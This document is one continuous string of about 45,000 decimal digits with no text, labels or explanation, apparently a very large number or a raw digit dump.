235181137961551059509565250439725322172065051043015968698727343299999829843624605075239297438825940837033395325558639903069604589937118821587025814505224339404394616149216723486466251048657919334113114636784094670816708194148592795991756773099412773592517441137346330558456552431433064711502757665689597160242663591468543998279643117223467886392689449953706294318032521835537124479903052572107774853822853579556545044826740083118564695088535916067584557198513638903705220041077915764235966453190334341937774125840001560944734054490384879377942866011723839086484910397944590192409207073978999060718402326351834108590826293215902139532764300421464171796979868326870754776224689594539578621908833090654918739771296793613752978773322885013352429863857847049713867921667058707003942972009905751210916938802347799219179923883396020950300972672561979919251286654225984770993638091068524730734608420678276577446064312466021858676375449790205665726144683684539751713212568696391603414901190093800365426628649279556352639719927285192206391272330927082863021566717520284878012553661102453407860261592340942179980376036959322957956883479637211587877906437998353024844728312193141513724645254968436260769988339017445643416326965172481382893508906113487723739940019195114945016467646507040818323887130927481970008835688100112469370843640278269709733904607730172591136433422098486394979020599515869373014796934808139961524337156668269897768971625834362874197528418971889424778033037786094849647030303485023136118936425426369628990442751851445885697718095282352485627713873191522957186030352163964199009267722113750671142633787769738795790487954571360482884119075681672488543403702991234740196639233029437610869027061499337521075398624679779931630045646122194671785524717438493191464087367168473267673896498038256996889879441925756844829175640870302243157833662056034797413028253268215546961581269506728595871804989374750555564106488511483705555114694658345355403565256578722559569988786061214875307675588033782038827182166678323499938228517233033143102278096981673817971918584189031862999046536051337172415283600700947289750231628452362114725900324058970162667340161514892285900423398746960180998627686317933273309803673548816262632025993825429614072300752987454276263023307122854045492155587412510744414994949389542518335409391513075194343661909915368091297729964787437213539214058949018639365753959904993074480104637963713884592770194846965414557291099320657106920513083294983303607623612155879199599276218469021823935365350204757686201241614671918312130727907634880147558167292354196113069152304933593420141067503811165204058906622726529620360547495106089583579595168992497550430750380826559987571072116237823095458629102127345062129015127688495108977399288402587054712733549991986094764367617119557766086501947549575266535204264518380651610663074428993957008517154914119471122081890671771089925876433695470388173054208141897960889753688455360642998160083651737288635745801562843551181499920980836396716658043130465735316533554477076420208765253309286939767388377331349401025401849170771300501529168718999392958860239592129486132259461927025487088516396967499299056130334700787113147776453396999698345773623920791099570962491336025850283558429465900029634535791535822648763374520509860236619043827402746789738013316658242057987041264311461420099786299890546907115655349971061129479760272693461536583729952289373904587268457903637507675335812150810439638409869792307659705645090906840645651915106997653382815143025295693939043541322878307335423443969344861199650465809086922874864160245215444374699407318597462848510433553584417956327568379458982013212827957408932866724155133715173872390903949917854144238689783598254608181828609281956249817299373748294751173625590745065135710298779447092052065349853445556095310919975511759683865905703462411217776851957115632180378488206577046518127413221689765787587600020433700349316734287856446763788809835441757174894145560530778953192776342371170762347855894197669029437079996547003227717131253805441073685356504942387247392093087001368292418779538135791762271896956214015683013497227754109486843207325640673020508659417574431110494291890906062827703467606152220231487726581563196727756128527120896207085288953052660201498826698686949359424539579188492688140617019615683630051109511867497273271426146388111908173260805454250877183947195788047273565737402838888873065942188333010365457904263980180700067434007968624837744318171854140538301582849100352257291601602977269186566002636041191551928728068174990931997122328316064474394949772947205617166937760604096138639546414453827951728235506158760414022275033698887921053520379987429479403544665347611925266669637212649440984664373440035600627031278438440209903993788405877492946997452083329838150822709479274710307816785701495877060666504117778287160117752615678686855092698710295947341949364811521682649368922278255049733845105433925294554524843793657894221055476387738096396399720832658120590504439076800749783421834901776031322406492921434039752427693551094917315966535485625811769155690435677854604706961372747575858126640552471151853778121980813222481116562057995121482839125785134754856363058690556291319307506521789649746757265506617217324203880658035572602389429089660511505362795837856453340129308962497244344107927048535562094644369407891234712136792269233671332001839225568989060216582516125141627728380462919731519818337283830170389239846207570385592928064395443396889049732910710443652642285842807592152263632068939268717566157663255303000088590677357506086094847730884191037336115219465189670345489862894700071115188599142734966426912656228461351611794298160123703380572505025532530847717447662255440858968299052085925646970769683109023261126545227325829618095829161041813757788525719235916412068759576326726689293446969000267871877963784611461514983040185431186836383636093967742785497231094701818303763603039728991489457724584314702377841682610066991175357329219025298135005381953538716027181693661716770669380546507336552410336507470978946405494714085541143616727269301793045571786589363851993584639580174617415600347679994682838762078062949243028228261211885481437810983567150094171076887432601289007208510174657483943712199226494346255098237469885849727935665617764306214351596611079273177810714481302881864591498799912776823479972756135250876885399420800816834720072288265842209500747337183899323102430908178121160347740744653024825652165472942200916351677819690147276100608494939003270970443219710727996971742661351165329493252471163106068472084668933870462358584538696612342354983000263864323082400649439989356447696952592379788149916203980144441622444579453856717075868666538450962521323805428580401069230402030621296836819435744290928749461183096731084927211453069731251750383677363455949365870474350113446273491686305528735031188334438433647123010951177116176952915775375397291951448656253262653604194685303876059768670756992220330975573984063897456813008446638445181964532192824526892019213693698955240671830713481197242807673562326998635758384066325102450193085567217321543404422600816741022839087533865542239872579787873603158798119861213676808419361685527060186609460435132087679515681718213027544334264513642041313048448782606565859178632142037272156464847217187593166368580124382836059508530960355921976699047953323969220598420599882532882138974067313792844193763789216311841947667187279102764855422145537703685762229014232457330823021503568720993853569916185610862661543123961796468280939339884608129823892730666752940593907908740931208011027433525971753495923161430489126362203200540406077932720260943375187960657954905323156745098073300291228360983748229633627676835835799724915555851807025976715086775869162080378311051868888999600089829071839650057115220881736956368685810779450496728375587501257330306462023223839357900511710140501788253199086458392267392196096421240510346606889966790249976517603847724620436111109138143000260114699712769888469764423039906452664428687166000590470787080576614246784345547476341061220302423548099143161038130823400022658862851209036950102096005613039124288807348072184092166472711536721657925132468260150718486475054098445743552750356256598037618719016842308286724149054082369992057412235215506326582515417556549869415506116825412418331292948679429610760259767976715045022881811881929686650169705468070246126373421018648652337489876621179749152890418012063728578566175580387227943259340809888392558653443339851212495774705094177562702289302830353109449063936467270651401163516013813195797684761144314870762799384782973094443938597377669112600780340841815739273598114648456804695669992336002513408061047960100573145006528998005463008052299968420038004233132900307587281546117061587875803777555155601780127202411534878800827437960795892897355021636592815049632593376118574945826392290738344185911673098463626423016968128731864958469783735032605661386379394284741752165591589451635924530157989176350077973730226781900838785518880355576493900854122168711337027877605940656034171707024291837246692977844868222687885869418764877441770559373475414637906416425598826062871800029993255246498035952419055943908304416068810995726580236656871728863553768952402749848875419614468521964047474802239664276164076245109109632643308223268302867085155867913434170634974237369491884733674427853485197392422111002441729408739395369038677840305790667059576572701425382246490492740303720565029897280538419425907186279247348334127686950745053780232333317118852376641618622260890998479797373048923607948806017979030253567685953261486197327654163072657386277822314914100534553166258303165622986572370385994862944300164174616092722245310748349368502293127460973814292500615829688866444538062119437025645740261662921427506614703547465934534413958819398435050855535170095927096525019475472372578564823795998054783522081416734829679208418856344927608430575114143025101159807780342790836198401120969099675775015899318861062064532009153134717867059313667363232984891043493901681218024683653663386381301011672174925571633898334018921895911639152650403793398766208993332460013961659356842348307562489191332935015318556504000575819285224959649329878451664956794388479650768143442277062178863042290571989372401017248009249686068822539331530352921693143203674508636545920924115870330098106361719348724571023949360215953305544602453719112759748714985308254911533260685586129875570389595145604100404893619021595210841986538320686835288261898670861291784187273433256128178724193075979146143832711504905747600906089650701632053195591634477488591940108789166991436851753812469203436916993791803382372547113764142465486555934092991273261741854644831759498604677923115614111206731053795240660318303606676034608085314202857570101440136239093653532075773041749040277942733996198340391246124506293969499418727053334008971451092813629842958045518542617532321815934963097316675413185575798195764371783557319622719870817855352642240391697647702747176184270197421557758072347665773444136218964335202920151166736137190544969467362280940628875965474678019425972097569412904601424413118281863303274388622572258275633126610136173821582643985966903080906607338982290389162847310595353661800263510438742432554772627516538953583463959532662050342173960919083911967419895883680810182413261361155578395209940908757014294306165878995283895074096690453469907005608120376293698136828364421373229912014640215154488967870192784296636667118682525625374720829482821464607541488873864029373457021526323141592236109636628797030444747448110457487719342225053817982762189429019285710041144690883698480412897652778860054946163160490947148495922784265852705704332561351052442769854244175823026922806742326220708142857349221741176297397247115910336871171074000124421315196555816405566361653461705464692933631682007694660488922349336516773922432660893975748889523297933977667003309300471824790827169463988359607676030718495901748107386825705426761249878455010399701082355474235013676516588187282769272514325359398537791699385985665731143035671106241812870058364679133359916593923605350304434469788254155692283455604604053911930081858594724303809175056334811245690946989430637657560973281199389608627114177677114592559723289494645528422523513259714027945940068965158512455015071642615218407201023045249366483517666849596723864636209687483714556461102429807460410367979732761752150229058745018782346783504422819188490511771614188857343744063874117835276708548898961594002950017181922161881854935233507944899383489629599120790009224833061216268864772472917729760587332360209615982828178823630529578438185242628566015778761787722006041058014145435984209339722124096392023026611115707628467719710109509107274140175338672459451472993558747656779943717925650152146976521561713136141409839731508182239891068795453083355180071132189176606373323611720854077519703658731710759255160908079550460400246225873141974265443170357511536944155323983475302072284507470939363185359263318180128824811988786061818830564020182115215308855344569950464117312221954785658025209391665271071537532255773529562508025802195272788875354082594262272540031874606430770204957484997394075677626671869904947380741690296842874006103265274539052461620534341565601958379073320089249299165508449987304880680321461618410427460315419604981742041770956856780383391580313377252103107749605997525946760055866966640162942444778800414754209290292725635219915057270479327839198285588465355139270121861159298850970320997173708113185467166310750301780760088291294485824526433358169220692500644908697035034280458265676166658718824758529496369624361555765704500227278326406054082292544661113821796193937352178113446687154563765474891903273920082344259645508485144510022833578329790117310753565563270992560571615608524248860276615985690931428073144714836669305105117678499269349752250177029085900632733686532047856758820726188872778953524474066415990255450084094517824942129072184038372449153346152705730756108960006537706467913928100781465778322740268444829942371798249648198978501463919111517813420040457178971918323669979741141642770476767602677897738731060926149170074915888257311026868390401502913680941901474591309757350307609900503116723370519500284178212506988195651828405647351166820798709633778542080881401543654147851209362555364145178047115672224363922706562656193405739290976320705117367757635302975745546394502271115078974584374904667466109485363634257254834374968708560755527493135511969701965394788145147170225266859099863914376729985670989109398390925443586398636455289198540523727797072656015852544716646542554504390503583769202774582235250612402850887580623576538773662876761977632598671982384409149257551313294635591696647325466259356715261857163944686487470118626100647049851484708896269893848761445891805103776753223583529765308820924491358385018318466577129206669461615102693680115722439867839987695531590948772463955411664944122633545709701530302511758543907360110819177194966118132787558763742415688673214164292072908768469060215746305560246833124323218104292809304475284820031281482568261723009580272161266747922567119122900111902320043811142183806650488942846772600916247877273440049604790228883160103699799750389767010275233178137924358466758778585408405392359648193480717781582523240884583511092901988219475552547541402607208207394102295275974612398903087921460631544422678056159774970222614821606512271075294468351026215812856215459855480316460690686741398391407283813132923194199611560936894587912969078761056574748656182085600259929838892037371449055924192406450621790749198704578581430684323857441347644585346632564770607532504382213653431646356552405659572417359449759698828979821896649665975883707012172346375852917476337305377184851589686064493815313530414677238249934279847806087879001240705507820073521994226653576455584874329028925364796271594107532004418837148145163130176965570418362242887852428967587806735418233419182059974594984228759776723560927924467588346918119857212374411443823576766213511229837785206503269004181312754454620624002700880388059423923158409783369763644629130618038851414955423482112773217453088604232435373025715924126543301600771108282087865598148428901420245154526999825892878077600592459093029011894295893106642729116373870188556020192833471397776482829325912573773669299113865307289818073553541745138445718172302255497297795110851700787577102407102018482413913450407472225076384518577814952788000665675123574683871429523984984007501284975058889054080528914679040263198243211451451591607006882797596084584361751012694000962709107085524264976214066895741899522794895695338735357371205699567002311370479223207557819672714195605919226674443949857200099606342720846548824241308613214198792373896479134927770706894953189683060227244951086716858059265466745294763044751819012168015135174192497246655310920800334475104485248032007156371527704778327118356673753135109064702414110583637888658356176845477504381532086540076727485213441524645181523987708577803916633986404429570547837193544679258868614638519218572301927181477886542325331738439203915239395286032494731096043503709633516030004450399057448110548090721367240922391774102363686664608773277712047226976593408919336585158372696535092465909050176905392883908839351192169787772494600245781449894104478823041972765326578506088135201924241980658552180871836317689645402008612001291064476307629438386829175889773704227598293905107992415279098046452603581602324836893429449881832177204288424704490442938151735718222273097342011064784008825889605169920843646612521475183057666704946723292259280433017990731035666913891205027538402837534791229904910132204125877175367227793560199123598731253749916865056136093728945070164737726078617958969000324048044857965445166974647827721157806818946816427781342302580752988736313101050431757873191083655841776887307082208155484592401026584778830582556965163134159480890520248721500213274840057130487799184271800186809288798808476401786450965866723886765311981048872216311758827312198132820753359412196681479632061841538838737473727629777672322326953174664388377113880426638444860993977566628799027183129786085143713970810024018671815941869078944063211360532328156516561548183524177025293053266244299872634231565342322803234260720337619077439531892343318193254143268462368841026315615389680806415078930383780373128283069373112384686804405671045882495018627434292214491928512235647929986399176598545230024454218010870164071020112193395731997930003670840359418383814540600041609493894642030720699869305724306289804363770024349615482579418648598623930061101935918055738692101064410506827137670651835708595259067449023295476199168157319128573431129124868361953571166223249469749264370117513383816061636186931194463188843084267624655067137790702455737018740146499381505284692673378540983152927916748402094498797646748480806600974027629433566377754173076331211860308909429585637078851020153961011055005236218276054237018990830336956874461602376858462434257408010668839510283249936032180598528662216999438926598288375416916980270178111147492946631552698776390746929341879259662573151543762211304833251443666712669225611338552292920184344683086806537656460064071952305528362952477325382954336314801359838688630585805415143835850384630609808285965977975694872307808219171039162398325298557965670850824695112800085782660027588643155664634385703908860924072923122986884508159378619079712138599535182482550339042803739094205612151154972846655838401071838459268858945358138686716526182735459967997393586152336938114124154222234558433726940928785220262953366797411239388261488758175784762543246465604193241940219039466565426928467627808091777602449644929373419192785261295420525910436306227248349668712320445235160011385320190768483165566776499657356309150989206314287912018086806904924097258316837060748861611532517563992443290788226367830387551273202930488076038069284288685408529855203505068606591498832381061701963899022112533414083240648349418694752780720678146861598356729952165397755150622096797488600730624709856038029755908342173956158879599074162839907351255375349167296597402772131869795613433048714147246402009992480236897324949461988794031652248052446181960375941875768230098865849876433277714338534427192217210336698135499840872828022142825582875869515356234053796367674788111688257321304431505680109047071300888175787554908096075421205949543291287394238651875935525296671803246089511040773961274266794755713321183149577291803835644630613425874173651153317671905384451219465442327340164757688611986341889872831177578539911515306314242842967532681495875282994900774731722175596380771998158526688137377834077035891782959777070234354763528023564326181079084087069096606365984903045591018633260222826180174941711784988110153366574807468366222831758081821738031175037420099802337054477604681721188901324508522503309317012442311785352040653309583331318756688993767819281126107550492037771628448364832668223541625145024790159170310636937777612562911802681458241074691623933709637015618970888549665182716558766061763216974864336260068827469769733300166164121456779649937816746655932538751378122668426813131905614962588045252280666352629398951710161269508636280752227393476309972416416427094488855377711429078171717387322270040152877703351504603611749374805737038873282215069107315073608215098857569336638320643975010127070411161575926902689381074735364675379805207004208871170830532024407493022987380155530056495859732588991330766205996122741232837124488213175936013609510883927354969029181353077860982747357535389612386855694610147940856589190863749145355626141823676070490571281747944099356879029617022160421982904411248027888888788679130943821014410164115407017033779414192736419603516873426342433721314210757019118027094629799246404825919006840736822371722535408604039285216167339385402585933276015337046722287681272154528027269336401945344188531147384915351942432801912601571585460163497959822946122054572254029800824792740143403982647751622433557213276206218353510350285387056898191758334311598363558427024341237602899646513126795876590783551606449744437991515588897440585322208501132465188001956288202433726571493343055557044531433820732733371874647395838521331567283128134658276066010541384494172226157011769407526760136900269248939746201163912978389180002507227427011394468907769927079453234690614290090476643762419562263165430424900890898680347401887478576216383889349612325938003423157538407435897268186026378790761045300863073191105708716648549053977956247065384749971471228005220751503251873556925367357289712261246814500360495483440586751518559333687886708644487336412066629766116291199079644235811364172778243822518719730583574152447954458555482969338430416823738512773553432866652637249706104844854141970273056151728080639559694198182822159606927652326414322293238978996033290699710601148719842680567004313389717334226843377886855761673466480574763166444878611688896838904786212273646708631338379331329973087021192704368808117419209135393938816423302134375236192739760409167216278268328085793696243661701252900491949455925776518530290370275150531491717372824015540999615655379032168692577925730014075928408537462897683823024335521640965583368323376232999878055141307341179563619323817919948022977749568809924861594816201765332553936704838144006899522887546456752542895787647639004559248469721714475777854062300380892214042007394739366726928921067929138024883248083545292464781409869100984153971804397121727388251102912296815020052120823647215359525653512035510437465161408656052912350158122101401220039974680985628483708332635043852482070018703678773301269724069250973518172179738473079258681182529477741257466646910736040336256537100714326078347746583854006905182461359672700136754596485351270856229894455082705595484210675644684744646366462183739401167026953394276632583908093304375451355378743429872170195335084300629224698565294624359231566526795938127013622391100953326962467989708727941437684886079305695622301404103040836249707051912848876311151541524402393931124603475915629046725302732078980152901284793896490209828476604023994684036525762386906965472263077972296878881573494494300570916109410729775396360340794414581229204949570959783605713460654235805237512040582069596809608487316164253507137313093882155078889413337722814164410255563508529339691836888367950481620014148185562681338818697107015519481254430239031051354038975609789748030432206873586296355653044702899155840481106009129761751329238598994806724218511209382079065990951607288342067336800387419685551303743172469723450346286277023679987715756967789016296563900579230931185335126846337255478872512052845198822570519233338422321702544572014511384411799735846628288513800725879646778849924375615696324759817876239534751725103888812139989997202536092783158694725589272960206422636686792678826472814840697496597529337477217322640141170558555465038670945102061524134752218501444972465808493123788181992210278417624734964942098837749264018475297319250151748883042030727512719259341034191636332945755259780512473461938531325915986832155450014806502808226079160618166039737269134339299666728944002620183752988956347604950878979466137277589175533885774300219244591716971524664063446978462037093239509808020629371501802859874743029683036098221685189513796674175482190360551317762107079705144812550526310742905959258992312813975967692099284820198572436017736662486819395285890132389902749117702632505707574171427474008121226099893968421129812209367662611563004455373217986663076434781454582707188369157967436840117780889320961011798833703906388810452445671486665052859456822199996569466260707596300595664639330324695657790349808569946262143076467081094253859512478746408137043793305725483535027285625463215668598655942699174097322361179849239561662395214544972007720864368764323818120485782772796957480066036390472530123328107922009037349769844017707302492777735306180608123911626961078397276116575085825347786858484839051461747898985752722823154214621642274825058494645734086554064055805431014756928711865332297410652732251249808411820687539590456240447132515720082067511047876323642331541283164532883931769009226056327272831606401114345938821054490730556983375688513360418674890096342506524100403202460019715290991139394713688199439197957232264204664986779438117699977539691865455443068325815483868731320128983919128853758589865144911626631783116106821750409951322495476724117810462714799127905134648569755454748822363722548933820522849645309034880219787132566424657040754608147231901751935600634302745124774718022616861233925154115512522187710766883940034477797629696194368659347322917790381193350350362477708644631760773090700677043783999242758849589636245520587715245597752606625029720829250697822614148719352473058311904839164125844828417317364310015318047019011116970008487541440666504187005766627205094280519806177438827502467149574421551490359462262067742308757209180052480526454580184714706632191247812850707241249099455086505979648432917437037909917820858255747556496171072656435165553059903259897747024394599932131401663945291860825214076782912636622467794469812353904516943275300330146622930712649864519135293131718732745026751036868948069549244596464004913620131334342521353194877895200877632462335347341181837998048752425845924371166863749973028987595105575019415445781989638615452774823044075569119128038074718186601087147521717530967030720280680558222370767009461527451730348797462449076780483121647958661493526441459467210103799028867092968899354741112495756617555354665134226326008701186253154178636953222569973336384129843930180657086933610936171935065309715692355789294018572946876659999852740938293907655862819600945929740399361372696878022598323085825822323453800065575154521369405146579624583653916543034853224339255394947986601543156617671170162299814910145090780092383125303805038595784876636844881530489853388784063938146364690976399169360396827072174102171340801116547306256597532690229387220289163619747788386676258506689141961563390835608354553570793987751412545530061768838203877681759467311068894224283853916627229040724199702554712223745385682004073486079557611898594930418812772479017072591157452449554736664922676931112813552483485774510230486564379959803333845457816921363875362359398671041443309637857653535001970262212914982653216687090423364282815488101803703480377163057063265999763285569206382828896417032852647078566184205778293489942391448155092104312232998238260284984692094301103390593709515762390670738540418669859225275122653225385641643171591193038688793044065746512150215594917209263413287060998231063255935866695127524261919123914987054788574339961307022204503063343997072370901497634298929702245534998673362812675136382352805166961935639808791424303507739429824124578996641699434598624957716259775108526072898814761994676627070697986994072488762729784550865066188012984915883380543042855242607275931942668143237447509254352085612190790254153171101593742295081460356310789495446275045086270509246483938858632063400635715267931554217527142835249768753025752241113236768702880687356516197828862812733967095016129578445056557246448908196530514155838524777244132513680578484836074979305061286638806584289848462961020479678124262004677423154264412444721201405574579425281955669305612123423958484063036810603328522989025418239549700547261626155968626008811501795965931210534156164461321904294564788827385854715202909752780425985544139665660696639699374045841604356251160136830564173118243308240525774085819451953320271896348828557890380537169874544964013448827011787471259726467854216280349486550550062308166329487348068801907362411014851221615131214331076642512507997752440361529447348891715607434903832836740882189487096806550156673982814776684565152967721398563457388600949941675106073802398881813039646473858202356923486390991854867515283770987071053567173594818558877517211206643886194280697262132321320041705560773492493155487378885639048550220530292327646428383398434443891877854005194733845447186293719247772263553558109503780838001772932869939280263200317401001872932976556746513029821877461168540775546240792965118542147439903812638083284205701906409306995209282385192577642296091167518344844635834017578031218266312016210870900169715029369097519414999456692880313027726817771270100207268576903778008164942642302331273701823829070558329405799155107385775977642706043480632118289342791509685854520372944289520877083391298830987533685702938886868167169233761730026153568693611622388004187278265326539296491337868948716737168244917703673351364858231416160101577891647500804981910834302475410115904205623109890179205381137656411589820056867612440863212257460354334238129064024149686894738811604014998701355616989318681733834167575478055006326187239476803256826410111639147717955359132994573313366229340783510486350293785662680998800238597070329567038175762211766452219097851665643218152416332668404916927593814865008122812212495327632637582396968719326835595706684664409973246695543879027037496513487891169930373813790612876594053764443823706217911576506886402224791954724908518010723702923203495599949576613934516130128731953385351344374454953858047421768129877600055627737049294891205132317532264146402757768898622817814040341787724445356272708676061089998729642539960369143429798879464291982393095640409004026213838809796600553753974724411111539611288387300893931889591167807030226373827011075775755424558752064096533847149591268053991552870678269582123223547876314489603182335042026476242898309207130252826009315463582408134148576338372768529588151293467784486136261601833069614821165221319726298900774332931429863737235533567233817039685378485077935111945325312104500217023826002133150300776570338238301915484937428443369789216861643248628501191866203778355306338107164303802413944300556713332599519082524510520363755646423986476297062414976648788880521640731279660939688885097930667213175950179124668621807926733536272415385823099972857279772330124828967651525467292773463131891060751895632931530256297903364482477349487617282414379494874022212508277406634863446968319841138276962242374872181771431180296771163213346149787628493053849548526984276657703233275846236855215844818779024347529363711475464577902760736803464898452400314310185296139161120794086383428799705500425259557578678995419510596702175274415301551834335728145481280586960975481907469551952792465314082726725050496944391384963953999536311625556058398771088993255303156045527333784482462442295243825883760996202211279960436026664036045763061240598495009537412014309665757025593579672598291857673190760597455187367840039598129241349880424253275025916158453672049845154050501901288263181023172805194692989093810768343656058353777079203929090700448834580767570044642650467028945184570110734866812336857017638884977440655242058749888202318303846951276358456867251807499397848411727978615260036875669502556030947365194986362675189826445689844290494244881037235916023486558482291222833709406471908842444126808442363963885953958479585256160831476622698960074158345535002940633055479425492506838452805850916599176473646635604697733861914969871334875704299783437908450731034946271742825646074679723877288775816356297864358851664801000542674026757880998724143093701211364277143540126432842634295058330977930341323191281869658781360484521783048863843498865052865162769156388963641134365102937270369402081673326824941428065466174814715799103553447415123184912061260485477459113882766389907884986224820273918439859456737324368618493667447900409219211519076544595409271715574121913152561274964384490225967532492617663795924954220330378726413182551879842277270575774641936988162440084724094755577043618918644436643124055409708735443960916644254659836992535921618784320958771586951161951161193242542053519850754715986971519504772586990845500908601648713354898163335120764981641411332356713718050359839158445022650115822236211426875771606631375101915096806776678033492059607025146640222441478372458292901665014051362685774585290985132365713323989475693202393086594582997207410204377207013187254702262124933867652351528999741525009814543676430723884856639852449414856111058743479094252379398312923860456747049660774861606397197828783972342407896833891219164353681682461702939057201259419377370677570994182635594974148046303742198170580597393618784927479813139450041523843942066932237207026714973286166985841631882217447848642639493064257008538119106262850010957707800749031704396986213734018770916718705779954315628880031834937080716512339046789048735639669405868388512009809607217892005144522699062496289297497989358386682280360748097727239950940793242652496675143065086565487444037509570579315334310137850510397406492379078025072093850979425049163528182520706501329030888016537056450196070810658039849158471556373775354242865959240406277863808842533005702560096825928596229313969160481927431965100106340441138868987651180278868313871215119944819037272120130026496178733478561219560895022898451481142831609014058527026509324397284859293815180879833469913839974103864951740125199651376003831915226959071343694097207479947008156012405969768331407852082370553749154554273995798194311904235898648836417103707718980211892570018066371676515253230913305314147269055053691568505836279944240979408342713706121434780033154997976318393246414995407112871557735997813008269327253596915120265142754814886161181857141767619816102980885899353482584968769570427471915991776508038542801754897196248543607502690476517453468236771958111861604301922884088843153014821464164618850109944775472054175804479336458293179708446858550947770000835116485998791045630525940877855767598054177435073519003812983062083533400773810176950474782302944787215670883267988916269179033682380821962025374382761226158556031949834474937131226875777284791120732037993524279714374287771768478530517504035869365683650400964210349486569767783525446762694933178213634753440734621677798766108313805859074634159187109799685137787990027127928339834023780571081738201448643104016073378511643427558450827306477222909840466614513832685609333233699340224275751630840724936258417997484906946504445862316301704726350790540617696829195367229573364030989477457866853802722725398856763378572362663861613711527060493373364097440051900601572847346872526636921529150897443232175126033541463736974341398795574371714742145813265737254029889379503262495209977793679985618687106833025486321267523444701302740470432775350032997419314096774106263021877574956243189989973857626011267968332323031899524935064876969861772484197166693975869111802876824247906094085189631756113669363097342957048570194337305593253867497556812536471190162553883067164602225586874387828808986927783530120425051522283129578218539022398850008101795833752246717680677458904475706944587759573753051788909102103111211228195980623562932935392581517026034155200157378848352631393299512130771748890777046049210024026718228598546248684436480631745412620767120802387813504020702108084859861019853568597495597755693737089396241514666646496147134873986327776167568185151178750749287592149655211811249396789314830790956421343954068978669102893002542200830932422138788622682116491359608642557061300507869104383229547920759079142360287488130575759877724895999457271650402589324100711004660549927052787377853807890505173600645101375150085406891755259910238460733041147737973317194601847503370911628604115217475827501900884677804401080449675415729414457143435971971725946042396100430833869793528978239881766526917355284551699396239575569973807219713765127094905176645045214504795660808701634259918341104301043864785911714033528573942922412913331404613516738474052508097523375007054725770176103441542836253893387078704411172248614091304011119191637689512655693724943738870971828378761876550502841935420326769692128942470624139763217852848615923849721668809904938837970849043437243689976895142469744926676970658521948218894686397792645516397451738658990642149880539687695163625813965332608323134232573322832941096275716506291629687006991611383092093012469280116715507271838484930668824643640447284223709818960708051291375206429863263265440669177584670817386636092399679417283565811241106815720933513991617639273984922736427279340226340071010514643009737017489451197777301686573479694044006396288460913832108213138466037132614404110950746405273700148043332451483471048034823614197779784952209387733509177491624633764955725941612494089092753201094718367966913129342065599123460743569861106864824247091018455026682559889337341088662961532162392520159090991355559023186233032588223504512343472154178969128825992827704772683833054211986226650639653327947959133720218279729447721324916229440697854281929158557374593431503047340057173418053101521146948125071364817269362080118117294145217821499665208304138451057681579641573428471406147658619467162350877775906515170664660997236962574151539963245554619060220864511156902589286343271338171462249263574643784572919940271634110682372432359819578295404820023267886456292235529534077389261210891743072570976149994234200894867718079453001474743885968619438178127138594651037109220871909932578223936097125630961310492644925515424366766214513578932974673176374515661435895549453602317251236919928530620812718316594391074557564688482157802429539333563715369513867789628578111760705719222664354069970075220035913086886960799256851350334815264397707637475156160617164592912475071227473522379791976353253670592068696358159530123036464983394544469086610487942558386387560249411644116238017451765362634916889885479959363531246771492247842567337538149978704416439039758746416705559254530633809380834891974078899801486212817119269211943531759534303865367423796019564919925006271294570305227968127385870185229857442256901000059167601305911102111643430223041613692204990409348599628943955732153764502202717458996440632706691305770384551552737917277668184051704845015339354193184587819445668853396338895506886007047541216352895901773593515682413430528138233211084266904137943514630589911005354497311511175336494234562219423340902117686236836041567730083262288863832149338702985082720638539878530934308909347845445112581527779136757872342383811279772227684758436016562346338818449048035614899464108009324509946074655668909733146346135688620989779801420088638276974750652861603508780287175051770676950293735874072772873167140046079215045095023620371035046896096856670906487392821030672341869776803929791006767212539493002655355355169998158315105953417493090788685700163989854398132290591167927749662103705543434288216764079539240877358047264729511243306159954591338488867120191627749978719841442717539013882862252583718690843210911830865098175260114272541588095764709958283031891253147734356066836984712583193197976325606945046334353770515498438094173987572867564178378738176061823138765967988743762671142856612691535957882957599691699994694479534330077427070094462974996543909995729460318617916720806129103827725906270361575212681291091084827461182164529776891675828801081012684402771550730726241931809880244003015226054735870491622172861437556832948675099402277805861594325194487511324329439440667982575821393561580344044888755165915685231256929246904873037395768785724507163800661878013675854847453200553950083251718173994018033156351328556180666761512582766369454880169687515183970230797806015712014272705462533992338128933003477649286605369984176227544684537150176190574817276893558434378279810665049399506402700805165760339810656090201832124553818882993068076928772691271979632577805538513940370206099870096831412255039831010053281400016868921138112583698166067008315049818533800755730166454969411921753642754015198942921774978679944506212857822449456436534269209548061847477546577897172732439294986221513182322816337153489241858915223014561768482320204684883428174357069700318476310721400334175945293212526803904212552302921296332861110462531220280763483161962370744059276964076305006573855897939055109957277199351291584881573411376363400883479135126854203478669830308071915858203134482682442655685019347633140829724062295625188173001938979445661702620816601229450352009473884952255480277960547120072100055496614000511239848661851415001684342497378471460180278622011075777904335264525216823365295793847334353549353962930189923073885474133522497635836655475575982216117481083662222923170561691337337317012826019186743876673074683513893433242113845031660133289679944074205049557487242420393284351226769028587689104463336109203974428926643681402047826697410665586434479962236201123079064795627634177983947473484148803915116360819782219312105190831804755303137978354065479977235439202057428331621567318291867239950129276574912986418621144423503142919483425680698857088741068982390763714172186156757684684691880575393307956258633965413699478895580942406120889433022679066762389457348934682342825234598462459594048537334032947881820411791366332134624951429171834055102398497384963996917088861702988110216326983845167723066111778410992924132442827763595485889290908519496450408008487718388864626476719316886664244462405772891864319635432921474741791217885323362650174171557439925480618440409064148802276149416149652513497738876277964187842295999753017366252849460099126492426374905708413501545615820734214604403679211651698938616618926563343396009770518213067997915801365181241074113799655187495482225656061554921117499873654395057340927681268492598816936776468213741121153107223569133486321506618564187622982637959997779101206234676162545435144883868688669043917211369857105884207111859980464898057490699353473284059303759211779154715495143680590898431279635026103664512257322007955483359274219648769529219255479165782588440960927496843244874875747336959324946405908551335296625766989011106261675035649752329187950150933993919081733445816700905398269203625957839902199100428785812600750634915049509037073718786022570390059575880938739866713563555917404670725325152172815873514823487285299702758898574498776390846940486046344457114174039214612585639761803156233335289167778071756369828896438697796355744397098058157751504565229870880824622564749401631743858410556174715383565331857834047583803721661182574406510634362895856798330850445962687396455319216470451075085089532389791048652786640759618227001750821941231219037661729056381841817465506270988095821598142929005314166846230704178501005857421153244135224317975753738254928659343087278910392525394461258506168350809092070237992176942931192024861239986760673693512814755369684137360626744589207074173258902817034125713088146525130743019934516223456973384211956179848613152410974143013580436602883341736339704457630726831982274805816478106224402654199241481367674555831843964521441216256655452617335554092313899053956835923039459134025958186487527581097830173618856601154662290985971942909256487125194995761336280145345154803262897206335878758415643528927934541912606884738314439886997670083417524722222631938057913177346981244209870814677637097033995417999028201235292382093103277458687059195091724091111906197094011486984351673075389232749069580426613630585599432648388919066715902213885018430249350673052924058808490902144222071870205289813533326235906175054880551701446722246612552192601950606977